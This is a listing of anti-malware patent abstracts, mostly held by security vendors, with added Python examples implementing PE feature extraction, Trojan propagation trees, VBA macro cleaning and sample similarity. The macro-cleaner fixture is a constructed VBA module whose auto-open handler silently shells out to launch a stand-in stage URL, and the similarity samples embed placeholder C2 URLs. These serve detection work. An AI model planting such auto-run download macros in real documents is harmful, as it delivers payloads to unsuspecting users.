Virus Detection Patents (Class 726/24)
  • Patent number: 9262296
    Abstract: Data is received or accessed that includes a structured file encapsulating data required by an execution environment to manage executable code wrapped within the structured file. Thereafter, code and data regions are iteratively identified in the structured file. Such identification is analyzed so that at least one feature can be extracted from the structured file. Related apparatus, systems, techniques and articles are also described.
    Type: Grant
    Filed: January 31, 2014
    Date of Patent: February 16, 2016
    Assignee: Cylance Inc.
    Inventors: Derek A. Soeder, Ryan Permeh, Gary Golomb, Matthew Wolff
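The Cylance abstract above describes walking a structured file (a PE image, in practice), labelling each region as code or data, and extracting features from that labelling. The block below is an added example written for this page, not code from the patent or from Cylance: it parses the PE section table, classifies each section by its characteristics flags, and derives a few features a scanner might use (whether the entry point lands in a code section, writable-and-executable sections, per-section entropy, truncated raw data). The sample images are constructed in memory by `build_image`, a helper written for this example; the feature set and the names used are my choices, not the patent's.

```python
"""Walk a PE section table, label regions code/data, derive scan features (added example)."""
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def _need(image: bytes, off: int, size: int) -> None:
    if off < 0 or off + size > len(image):
        raise ValueError(f"header field at {off:#x} lies outside the image")


def parse_sections(image: bytes):
    """Return (entry_rva, sections) for a PE32/PE32+ image; ValueError if headers are malformed."""
    _need(image, 0, 0x40)
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    _need(image, e_lfanew, 4 + 20)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    _need(image, opt, max(opt_size, 20))  # an undersized SizeOfOptionalHeader must not let us read past the end
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    (entry_rva,) = struct.unpack_from("<I", image, opt + 16)  # AddressOfEntryPoint
    sections = []
    for i in range(n_sections):  # iterate the section table, one region per header
        off = opt + opt_size + 40 * i
        _need(image, off, 40)
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        (chars,) = struct.unpack_from("<I", image, off + 36)
        truncated = raw_ptr + raw_size > len(image)
        raw = b"" if truncated else image[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "rva": vaddr,
            "span": max(vsize, raw_size),
            "kind": "code" if chars & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE) else "data",
            "writable": bool(chars & IMAGE_SCN_MEM_WRITE),
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "entropy": shannon_entropy(raw),
            "raw_truncated": truncated,
        })
    return entry_rva, sections


def extract_features(image: bytes) -> dict:
    """Features derived from the code/data labelling; the set is a choice for this example."""
    entry, secs = parse_sections(image)
    entry_sec = next((s for s in secs if s["rva"] <= entry < s["rva"] + s["span"]), None)
    return {
        "n_sections": len(secs),
        "n_code": sum(s["kind"] == "code" for s in secs),
        "n_data": sum(s["kind"] == "data" for s in secs),
        "entry_in_code": entry_sec is not None and entry_sec["kind"] == "code",
        "n_wx": sum(s["writable"] and s["executable"] for s in secs),
        "max_entropy": max((s["entropy"] for s in secs), default=0.0),
        "any_truncated": any(s["raw_truncated"] for s in secs),
    }


def build_image(sections, entry_rva: int) -> bytes:
    """Construct a minimal PE32 image for testing; fields the parser ignores are left zero."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    raw_ptr = 0x40 + 4 + 20 + 0xE0 + 40 * len(sections)
    table, blobs = b"", b""
    for name, rva, raw, chars in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(raw), rva, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        blobs += raw
        raw_ptr += len(raw)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + blobs


# Constructed inputs: a conventional layout, and a packer-like single RWX section of uniform bytes.
SAMPLE_PLAIN = build_image([
    (b".text", 0x1000, b"\x55\x8b\xec\x90" * 64, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x2000, b"\x00" * 128 + b"hello\x00", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
], entry_rva=0x1010)
SAMPLE_PACKED = build_image([
    (b"UPX1", 0x1000, bytes(range(256)) * 16, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
], entry_rva=0x1000)
```

Every offset is bounds-checked before it is read, because the header fields that steer the walk (e_lfanew, NumberOfSections, SizeOfOptionalHeader, PointerToRawData) are attacker-controlled; a section whose raw data runs past the end of the file is reported as truncated rather than silently ignored.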
  • Patent number: 9256552
    Abstract: In an embodiment, a data processing method comprises, in a computer executing a supervisor program: the supervisor program establishing a plurality of different memory access permissions comprising any combination of read, write, and execute permissions for one or more different regions of memory of a first domain; setting the memory access permissions of a first set of the regions of memory to execute only; in response to a request from a process to read or write a particular region of memory in the first set, performing one or more responsive actions that prevent the process from reading or modifying one or more instructions or one or more embedded immediate values of the particular region of memory. Embodiments provide selective access to executable memory.
    Type: Grant
    Filed: November 21, 2012
    Date of Patent: February 9, 2016
    Assignee: CISCO TECHNOLOGY, INC.
    Inventor: Joe Epstein
  • Patent number: 9256741
    Abstract: A method performed by a computer system determines propagation relationships of Trojan horse files. A current Trojan horse file is stored into a corresponding current level of a propagation relationship tree. A condition of the current Trojan horse file or of the propagation relationship tree is assessed. The following steps are repeated until the condition is satisfied: search Trojan horse files for a parent, child or sibling relative to the current Trojan horse file, identify one of the Trojan horse files as the current Trojan horse file, and store the current Trojan horse file into a corresponding current level of the propagation relationship tree. When the condition is satisfied, the propagation relationship tree is displayed. The storing of the current Trojan horse file may include storing an identifier of the current Trojan horse file, which may include data abstraction output, and/or a downloading address of the current Trojan horse file.
    Type: Grant
    Filed: May 13, 2014
    Date of Patent: February 9, 2016
    Assignee: TENCENT TECHNOLOGY (SHENZHEN) COMPANY LIMITED
    Inventor: Yeshang Tang
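The Tencent abstract describes building a propagation relationship tree level by level, searching for parent, child or sibling Trojan files of the current file until a stopping condition holds, then displaying the tree with each file's identifier and download address. The block below is an added example written for this page, not Tencent's code: it keeps a constructed sample store with parent links, climbs to the root so siblings are included, expands breadth-first until a depth limit or exhaustion, and renders the tree as indented text. The store layout, the identifiers and the URLs are constructed for the example.

```python
"""Build and print a Trojan propagation tree from parent/child download links (added example)."""
from collections import deque

# Constructed sample store: short ids stand in for hashes; "parent" is the file that downloaded it.
SAMPLES = {
    "d1": {"name": "dropper.exe", "url": "http://dl.example.invalid/a.exe", "parent": None},
    "p1": {"name": "payload1.dll", "url": "http://dl.example.invalid/b.dll", "parent": "d1"},
    "p2": {"name": "payload2.exe", "url": "http://cdn.example.invalid/c.exe", "parent": "d1"},
    "s3": {"name": "stage3.bin", "url": "http://cdn.example.invalid/d.bin", "parent": "p1"},
    "s4": {"name": "stage4.bin", "url": "http://cdn.example.invalid/e.bin", "parent": "s3"},
}


def children_of(samples, sid):
    return sorted(k for k, v in samples.items() if v["parent"] == sid)


def root_of(samples, sid):
    """Climb parent links to the top of the chain; a cycle in the data raises instead of looping."""
    seen = {sid}
    while samples[sid]["parent"] is not None:
        sid = samples[sid]["parent"]
        if sid in seen:
            raise ValueError(f"cycle in parent links at {sid}")
        seen.add(sid)
    return sid


def build_propagation_tree(samples, start, max_depth=None):
    """Breadth-first: each level holds the children of the previous one, until max_depth or exhaustion.

    Starting from any sample, siblings are covered by first climbing to the root, so the
    result is the whole family rather than only the subtree below `start`.
    """
    root = root_of(samples, start)
    tree = {"id": root, "level": 0, "children": []}
    queue, seen = deque([tree]), {root}
    while queue:
        node = queue.popleft()
        if max_depth is not None and node["level"] >= max_depth:
            continue  # stopping condition: depth limit reached for this branch
        for cid in children_of(samples, node["id"]):
            if cid in seen:  # guard against duplicate or looping child links
                continue
            seen.add(cid)
            child = {"id": cid, "level": node["level"] + 1, "children": []}
            node["children"].append(child)
            queue.append(child)
    return tree


def render(tree, samples):
    """Indented text view: one line per node with name, identifier and download address."""
    lines = []

    def walk(node):
        s = samples[node["id"]]
        lines.append(f"{'  ' * node['level']}{s['name']} [{node['id']}] <- {s['url']}")
        for child in node["children"]:
            walk(child)

    walk(tree)
    return lines


def count_nodes(tree):
    return 1 + sum(count_nodes(c) for c in tree["children"])
```

Called with `render(build_propagation_tree(SAMPLES, "p2"), SAMPLES)`, the output starts at the dropper even though the query was one of its payloads, because the tree is expanded from the root of the chain.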
  • Patent number: 9251344
    Abstract: The present disclosure relates to a method, a device and a storage medium for processing viruses which can automatically determine which processing mode is best for the current status of the electronic apparatus. The method includes: detecting a virus scan operation; in response to the virus scan operation, determining whether conditions (i) and (ii) are true, wherein condition (i) is true when the time interval between the last time viruses were processed using a first virus processing mode and the current time is larger than a preset interval, and condition (ii) is true when at least one risk situation existed during the time period between the last time viruses were processed using the first virus processing mode and the current time; if either of conditions (i) and (ii) is true, calling the first virus processing mode to scan files in the electronic apparatus.
    Type: Grant
    Filed: April 22, 2014
    Date of Patent: February 2, 2016
    Assignee: TENCENT TECHNOLOGY (SHENZHEN) COMPANY LIMITED
    Inventors: Ye Zou, Ru-Lan Lin, Wen-Liang Tang
  • Patent number: 9245120
    Abstract: The present invention relates to the security of general purpose computing devices, such as laptop or desktop PCs, and more specifically to the detection of malicious software (malware) on a general purpose computing device. A challenge in detecting malicious software is that files are typically scanned for the presence of malicious intent only once (and subsequent rescanning is typically performed in a simplistic manner). Existing methods in the art do not address how to most effectively rescan collections of files in a way that tries to optimize performance and efficacy. Accordingly we present novel methods, components, and systems for intelligently rescanning file collections and thereby enabling retroactive detection of malicious software and also retroactive identification of clean software. These methods may also be useful if additional information is now available regarding a file that might be useful to an end-user or an administrator, even though the file's core disposition might not have changed.
    Type: Grant
    Filed: July 15, 2013
    Date of Patent: January 26, 2016
    Assignee: Cisco Technologies, Inc.
    Inventors: Oliver Friedrichs, Alfred Huger, Zulfikar Ramzan
  • Patent number: 9245122
    Abstract: Technologies are described herein for anti-malware support within firmware. Through the utilization of the technologies and concepts presented herein, malicious software protection may be extended down to the firmware level. Detecting malicious firmware or software, removing it from firmware, and actively preventing it from exploiting known security vulnerabilities may be supported. Application level anti-malware software may interface with, and be supported by, one or more firmware level anti-malware modules. Firmware level anti-malware modules can actively prevent malicious software from affecting the system firmware. For example, the anti-malware modules may monitor or block access to the firmware. Anti-malware modules may be available at both boot-time and run-time. Thus, a wider range of malicious software attacks or infiltrations may be mitigated.
    Type: Grant
    Filed: October 2, 2014
    Date of Patent: January 26, 2016
    Assignee: American Megatrends, Inc.
    Inventor: Matthew Lazarowitz
  • Patent number: 9246935
    Abstract: One or more relevant scanners used to identify asset vulnerabilities are identified, obtained, and logically arranged for deployment on an asset in accordance with a vulnerability management policy and a scanner deployment policy such that the relevant scanners are deployed at, or before, a determined ideal time to minimize the resources necessary to correct the vulnerabilities, if found. The relevant scanners are then automatically deployed in accordance with the scanner deployment policy and, if a vulnerability is identified, one or more associated remedies or remedy procedures are applied to the asset. At least one of the one or more relevant scanners is then re-deployed on the asset to determine if the identified vulnerability has been corrected and, if the vulnerability is not corrected at, or before, a defined time, protective measures are automatically taken.
    Type: Grant
    Filed: October 14, 2013
    Date of Patent: January 26, 2016
    Assignee: Intuit Inc.
    Inventors: M. Shannon Lietz, Luis Felipe Cabrera, Barry J. Nisly, Ted R. Neher, III, Javier Godinez, Ankur Jain
  • Patent number: 9245139
    Abstract: A system and method for non-retained electronic messaging is described. In one embodiment, the system includes a message receiver module, a message storing and identifier generation module, a message retrieval module and an expunging module. The message receiver module receives a message. The message storing and identifier generation module stores the message in a non-transitory, non-persistent memory of one or more computing devices, generates a message identifier and sends the message identifier to a recipient device. The message retrieval module receives a selection of the message identifier from the recipient device, retrieves the message from the non-transitory, non-persistent memory, and sends the message to the recipient device for presentation. The expunging module expunges the message from the one or more devices responsive to sending the message to the recipient device for presentation.
    Type: Grant
    Filed: September 15, 2014
    Date of Patent: January 26, 2016
    Inventor: John R. Thorpe
  • Patent number: 9245108
    Abstract: Approaches for an operating system to ascertain whether files stored in its file system have been deemed trustworthy. When an operating system receives a request to perform an operation involving a file that is stored within the file system maintained by the operating system, the operating system requests the file from a driver. In turn, the driver consults a set of trust data to identify whether the file has been previously deemed trustworthy. Upon the driver determining that the file has been deemed trustworthy, the driver provides the file to the operating system in a first format. On the other hand, upon the driver determining that the file has not been deemed trustworthy, the driver provides the file to the operating system in a second format that is different than the first format. Advantageously, the file is stored in a single format in the file system.
    Type: Grant
    Filed: July 8, 2014
    Date of Patent: January 26, 2016
    Assignee: Bromium, Inc.
    Inventors: Deepak Khajuria, Mahesh Pisal, Krzysztof Uchronski, Vikram Kapoor, Ian Pratt, Gaurav Banga
  • Patent number: 9239907
    Abstract: Techniques for identifying misleading applications are disclosed. In one particular exemplary embodiment, the techniques may be realized as a method for identifying misleading applications comprising receiving a request for network data, parsing the request for network data, using a processor, to determine if one or more portions of the request match a suspicious indicator, identifying the suspicious indicator without using a known malware domain or a known malware signature, and performing a specified action in the event one or more portions of the request match a suspicious indicator.
    Type: Grant
    Filed: July 6, 2010
    Date of Patent: January 19, 2016
    Assignee: Symantec Corporation
    Inventors: Jamie Jooyoung Park, Joseph Huaning Chen
  • Patent number: 9235706
    Abstract: A method for preventing malware attacks includes the steps of detecting an attempt on an electronic device to access a task scheduler, determining an entity associated with the attempt to access the task scheduler, determining a malware status of the entity, and, based on the malware status of the entity, allowing or denying the attempted access to the task scheduler. The task scheduler is configured to launch one or more applications at a specified time or interval.
    Type: Grant
    Filed: December 2, 2011
    Date of Patent: January 12, 2016
    Assignee: McAfee, Inc.
    Inventors: Anil Ramabhatta, Harinath Vishwanath Ramachetty, Nandi Dharma Kishore
  • Patent number: 9230111
    Abstract: A computer-implemented method for protecting document files from macro threats may include (1) identifying a document file that contains an embedded macro, (2) locating an event-driven programming language module that stores the embedded macro for the document file, and (3) cleaning the event-driven programming language module by removing procedures for the embedded macro within the event-driven programming language module and retaining variable definitions within the event-driven programming language module. Various other methods, systems, and computer-readable media are also disclosed.
    Type: Grant
    Filed: November 6, 2013
    Date of Patent: January 5, 2016
    Assignee: Symantec Corporation
    Inventors: Susanta Nanda, Sandeep Bhatkar, Fanglu Guo
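The Symantec abstract above sanitizes a document by removing the procedures from its VBA module while retaining the module's variable definitions. The block below is an added example written for this page, not Symantec's code. It assumes the module source has already been extracted and decompressed from the document's VBA project streams (that step is not shown) and works on the source text with a line-based state machine: everything between a `Sub`/`Function`/`Property` header and its matching `End` line is dropped, everything at module level (`Attribute`, `Option`, `Dim`, `Const`, `Declare`) is kept. The sample module is constructed for the example.

```python
"""Strip procedure bodies from a VBA module, keep module-level declarations (added example)."""
import re

# Procedure header: optional visibility, optional Static, then Sub / Function / Property.
PROC_START = re.compile(
    r"^\s*(?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?(Sub|Function|Property)\b", re.IGNORECASE)
PROC_END = re.compile(r"^\s*End\s+(Sub|Function|Property)\b", re.IGNORECASE)


def clean_vba_module(source: str):
    """Return (cleaned_source, removed_headers).

    Lines from a procedure header through its matching End Sub/Function/Property are
    dropped, including any Dim inside the procedure (those are locals, not module state).
    Lines outside procedures (Attribute, Option, Dim, Const, Declare, Type ...) are kept
    unchanged, so the module still compiles but no longer has any code that runs.
    """
    kept, removed = [], []
    open_kind = None  # kind of the procedure currently being skipped, or None
    for line in source.splitlines():
        if open_kind is None:
            m = PROC_START.match(line)
            if m:
                open_kind = m.group(1).lower()
                removed.append(line.strip())
            else:
                kept.append(line)
            continue
        m = PROC_END.match(line)
        if m and m.group(1).lower() == open_kind:
            open_kind = None
    if open_kind is not None:
        raise ValueError(f"procedure starting at '{removed[-1]}' has no End {open_kind}")
    return "\n".join(kept).rstrip() + "\n", removed


def has_procedures(source: str) -> bool:
    """True if any line still opens a procedure; False for a cleaned module."""
    return any(PROC_START.match(line) for line in source.splitlines())


# Constructed sample module: auto-open handler plus a helper, with module-level state.
SAMPLE_MODULE = '''Attribute VB_Name = "ThisDocument"
Option Explicit
Public Const STAGE_URL As String = "http://dl.example.invalid/stage"
Dim gRunCount As Long

Private Sub Document_Open()
    Dim cmd As String
    If gRunCount > 0 Then Exit Sub
    cmd = "cmd.exe /c start " & STAGE_URL
    Shell cmd, vbHide
End Sub

Public Function Twice(ByVal x As Long) As Long
    Twice = x * 2
End Function
'''
```

The cleaner is deliberately conservative: an unterminated procedure raises rather than producing a half-cleaned module, and the output is idempotent (cleaning a cleaned module changes nothing). It does not interpret line continuations (`_`) or string literals, so a header split across lines or an `End Sub` inside a string would need the real VBA tokenizer; `Declare` lines are kept because without any procedure left to call them they are inert, but a stricter policy could drop them too.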
  • Patent number: 9229763
    Abstract: A method and system for providing a guest with virtual media that can be read by the guest. A hypervisor hosted by a computer system presents a guest-to-host channel to a guest in the computer system. The hypervisor receives content from the guest via the guest-to-host channel, the content to be stored and managed by the hypervisor in a memory area associated with the guest in the computer system, the memory area not being directly accessible to the guest. The hypervisor then receives a request from the guest indicating that the guest is to perform at least one operation on the content, and provides the content for the guest to perform the at least one operation.
    Type: Grant
    Filed: March 16, 2015
    Date of Patent: January 5, 2016
    Assignee: Red Hat, Ltd.
    Inventors: Michael S. Tsirkin, Gleb Natapov
  • Patent number: 9223975
    Abstract: Disclosed is a method of operating a data storage system. The method comprises identifying changed segments of a primary storage volume, receiving a data request for a plurality of data items in a secondary storage volume, identifying changed data items of the plurality of data items in the secondary storage volume based on a correspondence between the plurality of data items in the secondary storage volume and the changed segments of the primary storage volume, and transferring the changed data items in response to the data request.
    Type: Grant
    Filed: January 27, 2014
    Date of Patent: December 29, 2015
    Assignee: Quantum Corporation
    Inventors: Gregory L. Wade, J. Mitchell Haile
  • Patent number: 9223969
    Abstract: Provided are an anti-malware system, and an operating method thereof. The anti-malware system matches a filtering operation on first target data to be filtered with a rule pattern, performs a filtering operation on the first target data according to a matching result, matches second target data to be malware-scanned with a malware pattern, and performs a malware scanning operation on the second target data according to a matching result, wherein the filtering operation and the scanning operation are performed on a system-on-chip (SoC).
    Type: Grant
    Filed: June 7, 2011
    Date of Patent: December 29, 2015
    Assignee: SAMSUNG SDS CO., LTD.
    Inventor: InSeon Yoo
  • Patent number: 9223973
    Abstract: A system and method for preventing malware attacks on mobile devices is presented. A server receives data from a mobile communications device and applies, by a known good component, logic on the data to determine if the data is safe. When the data is determined as being safe, the data is allowed to be processed by the mobile communications device. When the data is determined as not safe, a known bad component applies logic on the data to determine if the data is malicious. The data is rejected from being processed by the mobile communications device when the data is determined as being malicious. When the data is not malicious, a decision component performs an analysis on the data. If the decision component determines the data to be safe, the data is allowed to be processed by the mobile communications device. Otherwise, the data is rejected from being processed.
    Type: Grant
    Filed: August 8, 2014
    Date of Patent: December 29, 2015
    Assignee: LOOKOUT, INC.
    Inventor: Kevin Patrick Mahaffey
  • Patent number: 9223721
    Abstract: A method includes assigning unique guest identifications to different guests, specifying an address region and permissions for the different guests and controlling a guest jump from one physical memory segment to a second physical memory segment through operational permissions defined in a root memory management unit that supports guest isolation and protection.
    Type: Grant
    Filed: September 4, 2012
    Date of Patent: December 29, 2015
    Assignee: ARM FINANCE OVERSEAS LIMITED
    Inventors: Sanjay Patel, Ranjit Joseph Rozario
  • Patent number: 9219707
    Abstract: A computer-implemented method for sharing the results of malware scans within networks may include (1) identifying a set of files stored on a set of client devices within a network, (2) obtaining a set of copies of the files stored on the client devices within the network, (3) performing a malware scan on the copies of the files, (4) generating a result of the malware scan performed on the copies of the files, and then (5) sharing the result of the malware scan with at least a subset of the client devices within the network to enable the subset of client devices to use the result of the malware scan instead of each performing an additional malware scan that is at least partially redundant to the malware scan performed on the copies of the files. Various other methods, systems, and computer-readable media are also disclosed.
    Type: Grant
    Filed: June 25, 2013
    Date of Patent: December 22, 2015
    Assignee: Symantec Corporation
    Inventors: Haik Mesropian, Wesley Jordan
  • Patent number: 9218372
    Abstract: A system and method of record matching using regular expressions and finite state representations. In this manner, the time (or computational effort) involved in record matching is reduced.
    Type: Grant
    Filed: August 2, 2012
    Date of Patent: December 22, 2015
    Assignee: SAP SE
    Inventors: Mohammad Shami, Kevin Wright
  • Patent number: 9218254
    Abstract: Systems, methods, and media for recovering an application from a fault or an attack are disclosed herein. In some embodiments, a method is provided for enabling a software application to recover from a fault condition. The method includes specifying constrained data items and assigning a set of repair procedures to the constrained data items. The method further includes detecting a fault condition on the constrained data items during execution of the software application, which triggers at least one repair procedure. The triggered repair procedures are executed and the execution of the software application is restored. In some embodiments, the restoring comprises providing memory rollback to a point of execution of the software application before the fault condition was detected.
    Type: Grant
    Filed: December 18, 2014
    Date of Patent: December 22, 2015
    Assignee: The Trustees of Columbia University in the City of New York
    Inventors: Michael E. Locasto, Angelos D. Keromytis, Angelos Stavrou, Gabriela F. Ciocarlie
  • Patent number: 9213831
    Abstract: The various aspects provide a method for recognizing and preventing malicious behavior on a mobile computing device before it occurs by monitoring and modifying instructions pending in the mobile computing device's hardware pipeline (i.e., queued instructions). In the various aspects, a mobile computing device may preemptively determine whether executing a set of queued instructions will result in a malicious configuration given the mobile computing device's current configuration. When the mobile computing device determines that executing the queued instructions will result in a malicious configuration, the mobile computing device may stop execution of the queued instructions or take other actions to preempt the malicious behavior before the queued instructions are executed.
    Type: Grant
    Filed: October 3, 2013
    Date of Patent: December 15, 2015
    Assignee: QUALCOMM Incorporated
    Inventors: Vinay Sridhara, Satyajit Prabhakar Patne, Rajarshi Gupta
  • Patent number: 9213859
    Abstract: Systems and methods for obfuscating user data in a remote web-based application are disclosed. According to one method, user inputs to a displayed web page of the remote web-based application are received at a first web browser that is used by the user, wherein at least a portion of the user inputs comprise user-inputted data intended to be stored at the web-based application. The user inputs are transmitted to a management component that is configured to interact with a second web browser that communicates with the web-based application. The management component obfuscates at least a portion of the user-inputted data and forwards the obfuscated and un-obfuscated portions of the user inputs to the second web browser, which correspondingly transmits the obfuscated and un-obfuscated portions of the user inputs to the remote web-based application.
    Type: Grant
    Filed: November 20, 2014
    Date of Patent: December 15, 2015
    Assignee: VMware, Inc.
    Inventors: Steven Henry Strassmann, Zachary James Shepherd
  • Patent number: 9210127
    Abstract: System and methods for connection processing with limited data leakage. The system records state associated with a connection request in a connection state engine, records state associated with a connection acknowledgement in the connection state engine, stores data sent after the connection acknowledgement in a buffer and determines, without a proxy, whether to allow or deny a connection as a function of the data stored in the buffer.
    Type: Grant
    Filed: June 15, 2011
    Date of Patent: December 8, 2015
    Inventors: Paul Meyer, David Diehl, Spencer Minear
  • Patent number: 9208235
    Abstract: A computer-implemented method for profiling a web application. A web page containing JavaScript (JS) is crawled. At least a portion of the JS is extracted from the crawled web page. An automated simulation of the extracted JS is executed.
    Type: Grant
    Filed: March 11, 2013
    Date of Patent: December 8, 2015
    Assignee: Symantec Corporation
    Inventor: Yin Liu
  • Patent number: 9208327
    Abstract: Adware and viruses are examples of objects that may be embedded in a web page or linked to a web page. When such an object is detected to be associated with a web page loading on a browser, an analysis may be performed to determine a trust level for the object. The object is suppressed based on the trust level. A prompt is displayed to advise a user that the object has been suppressed, and to provide an opportunity to interactively accept or decline activation of an action for the object.
    Type: Grant
    Filed: May 23, 2013
    Date of Patent: December 8, 2015
    Assignee: Microsoft Technology Licensing, LLC
    Inventors: Aaron Sauve, Li-Hsin Huang, Tony Schreiner, Jeffrey Davis, Tom Pipinich, Jonathan Gass, J. Craig Hally
  • Patent number: 9203851
    Abstract: An on-premise computer in the form of an on-premise gateway receives data transmitted by a client to an intended destination server. The on-premise gateway and the client are on-premise within the same private computer network. The on-premise gateway determines whether or not the data is to be scanned for security checks by a cloud scanning service provided by a cloud scanner on the Internet. The on-premise gateway redirects the data to the cloud scanner when the data is to be scanned in the cloud. Otherwise, when the data is not to be scanned in the cloud, the on-premise gateway forwards the data to the destination server without having the data scanned by the cloud scanner.
    Type: Grant
    Filed: May 13, 2014
    Date of Patent: December 1, 2015
    Assignee: Trend Micro Incorporated
    Inventors: Chen Wang, Yongjun Wei, Yeli Xu, Gongwei Qian
  • Patent number: 9202065
    Abstract: An owner of sensitive data is provided with a notification that the sensitive data has been located. To achieve this, the sensitive data is first modified to include one or more data strings that may appear to be suspect but are otherwise benign. These data strings, which are referred to herein as benign pseudo virus signatures (BPVSs), preferably are embedded throughout a piece of sensitive data according to a frequency distribution. When the sensitive data is examined by virus checking software, the benign pseudo virus signatures are detected as potential computer viruses. By using information associated with the signatures, the owner is identified, preferably using the assistance of an intermediary entity that acts as a registry for the BPVSs. Once the owner is identified, a notification is provided to the owner that the sensitive data has been located. Appropriate remedial action can then be taken.
    Type: Grant
    Filed: May 28, 2013
    Date of Patent: December 1, 2015
    Assignee: GLOBALFOUNDRIES Inc.
    Inventor: Robert John McCormack
  • Patent number: 9203862
    Abstract: Updating a central repository with information about malware resident upon a computer system. Upon detecting the malware executing in a virtual machine, a software module, without manual instruction, sends malware manifest data to a central repository over a network. The malware manifest data may comprise a copy of the malware and data identifying or comprising a set of files infected by the malware. The central repository may receive, over a network from at least two computer systems, distinct sets of malware manifest data and may subsequently store the sets of malware manifest data.
    Type: Grant
    Filed: July 1, 2013
    Date of Patent: December 1, 2015
    Assignee: Bromium, Inc.
    Inventors: Rahul C. Kashyap, J. McEnroe Samuel Navaraj, Arun Passi
  • Patent number: 9203854
    Abstract: Novel methods, components, and systems for detecting malicious software in a proactive manner are presented. More specifically, we describe methods, components, and systems that leverage machine learning techniques to detect malicious software. The disclosed invention provides a significant improvement with regard to detection capabilities compared to previous approaches.
    Type: Grant
    Filed: October 3, 2014
    Date of Patent: December 1, 2015
    Assignee: Cisco Technology, Inc.
    Inventors: Oliver Friedrichs, Alfred Huger, Adam J. O'Donnell
  • Patent number: 9197665
    Abstract: Methods, system, and media for determining similar malware samples are disclosed. Two or more malware samples are received and analyzed to extract information from the two or more malware samples. The extracted information is converted to a plurality of sets of strings. A similarity between the two or more malware samples is determined based on the plurality of the sets of strings.
    Type: Grant
    Filed: March 9, 2015
    Date of Patent: November 24, 2015
    Inventors: Charles Cabot, Rebecca A. Borbely, Michael W. West, Mark V. Raugas
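The abstract above compares malware samples by extracting information from each, converting it to several sets of strings, and scoring similarity over those sets. The block below is an added example written for this page, not the inventors' code: it pulls printable ASCII runs from each sample, splits them into three sets (all strings, URLs, Win32-looking API names), scores each set with Jaccard similarity, and combines the scores with weights. The weighting, the three-set split and the `_blob` sample builder are choices made for this example, and the sample "binaries" are constructed byte strings, not real malware.

```python
"""Similarity of malware samples via sets of extracted strings (added example)."""
import re

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")            # ASCII runs of four or more characters
URL = re.compile(r"https?://[^\s\"'<>]+")
WIN_API = re.compile(r"^[A-Z][A-Za-z0-9]+(?:A|W|Ex)?$")  # heuristic for CamelCase Win32 names


def extract_strings(blob: bytes) -> set:
    return {m.group().decode("ascii") for m in PRINTABLE.finditer(blob)}


def string_sets(blob: bytes) -> dict:
    """Split the extracted strings into several sets so each kind can be weighted on its own."""
    strings = extract_strings(blob)
    return {
        "all": strings,
        "urls": {s for s in strings if URL.fullmatch(s)},
        "apis": {s for s in strings if WIN_API.match(s)},
    }


def jaccard(a: set, b: set) -> float:
    union = a | b
    return len(a & b) / len(union) if union else 0.0


def similarity(sets_a: dict, sets_b: dict, weights=None) -> float:
    """Weighted mean of per-set Jaccard scores; a set that is empty on both sides carries no vote."""
    weights = weights or {"all": 1.0, "urls": 2.0, "apis": 1.0}
    num = den = 0.0
    for name, w in weights.items():
        a, b = sets_a.get(name, set()), sets_b.get(name, set())
        if not a and not b:
            continue
        num += w * jaccard(a, b)
        den += w
    return num / den if den else 0.0


def rank_similar(query: bytes, corpus: dict) -> list:
    """Return [(name, score), ...] for every sample in corpus, most similar first."""
    q = string_sets(query)
    scored = [(name, similarity(q, string_sets(blob))) for name, blob in corpus.items()]
    return sorted(scored, key=lambda kv: (-kv[1], kv[0]))


def _blob(*strings: str) -> bytes:
    """Constructed stand-in for a binary: the strings separated by non-printable filler."""
    filler = b"\x00\x01\xff\x00"
    return filler + filler.join(s.encode("ascii") for s in strings) + filler


# Constructed samples: A and B differ only in their URL; C is unrelated.
SAMPLE_A = _blob("!This program cannot be run in DOS mode.", "LoadLibraryA", "GetProcAddress",
                 "http://c2.example.invalid/gate.php", "Mozilla/5.0 (compatible)")
SAMPLE_B = _blob("!This program cannot be run in DOS mode.", "LoadLibraryA", "GetProcAddress",
                 "http://c2.example.invalid/update.php", "Mozilla/5.0 (compatible)")
SAMPLE_C = _blob("!This program cannot be run in DOS mode.", "Hello, world!", "CreateFileW")
```

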